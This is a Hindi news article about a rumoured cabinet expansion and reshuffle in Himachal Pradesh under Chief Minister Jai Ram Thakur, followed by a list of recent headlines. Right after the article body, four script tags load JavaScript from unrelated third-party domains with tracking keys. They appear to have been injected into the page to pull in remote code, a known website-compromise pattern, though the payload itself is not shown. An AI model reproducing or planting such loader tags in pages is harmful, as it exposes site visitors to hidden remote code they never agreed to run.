किसके कतरे जाएंगे पर- किसके सिर सजेगा ताज, अगले हफ़्ते बड़े फ़ेरबदल की संभावना

<p>हिमाचल में मंत्रिमंडल विस्तार होना है जिसको लेकर सियासी पारा पूरे उफ़ान पर है। इस सब के बीच कई तरह की चर्चाओं का बाज़ार गर्म है। जल्द ही मंत्रिमंडल के विस्तार के साथ फेरबदल हो सकता है। मुख्यमंत्री जय राम ठाकुर ने इसके संकेत भी दे दिए है। बताया जा रहा है कि मंत्रिमंडल को लेकर आलाकमान से भी चर्चा हो चुकी है। मंत्रिमंडल विस्तार में दो नए मंत्री बनने है। उसमें नूरपुर के विधायक राकेश पठानियां दौड़ में सबसे आगे है। लेकिन इससे हटकर फ़ेरबदल को लेकर आजकल कई मंत्रियों की रातों की नींदे और दिन का चैन उड़ा हुआ है।</p>

<p>सूचना तो यहां तक हैं कि एक आध मंत्री को ड्राप भी किया जा सकता है। जबकि एक मंत्री को मंत्रिमंडल से हटाकर विधानसभा अध्यक्ष बनाया जा सकता है। इसकी चर्चा भी जोरों पर है। सूत्र तो ये भी बता रहे हैं कि मंत्रिमंडल में एक महिला को भी तरज़ीह दी जा सकती है। मुख्यमंत्री परफॉर्मेंस को आधार बनाकर मंत्रिमंडल में विस्तार और फ़ेरबदल की बात कह चुके है। ऐसे में दो मंत्री ड्राप और चार नए चेहरे मंत्रिमंडल में लाए जा सकते है। विधानसभा अध्यक्ष डॉ राजीव बिंदल के मंत्रिमंडल में शामिल किए जाने का शोर भी राजनीतिक गलियारों में खूब है।</p>

<p>ख़बर तो ये भी है कि जल्द ही बड़ा प्रसाशनिक फ़ेरबदल भी देखने को मिल सकता है। मुख्यमंत्री के इर्दगिर्द रहने वाले अफसरों को भी बदला जा रहा है। जिसमें एक ओएसडी व पीएस भी शामिल है। अगले हफ़्ते मंत्रिमंडल सहित ये सभी फ़ेरबदल होने की संभावना व्यक्त की जा रही है। अब देखना है कि किसके पर कटते है व किसको&nbsp; तरक्की मिलती हैं।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1573702247129″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

3 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

3 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

4 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

5 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

5 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

6 hours ago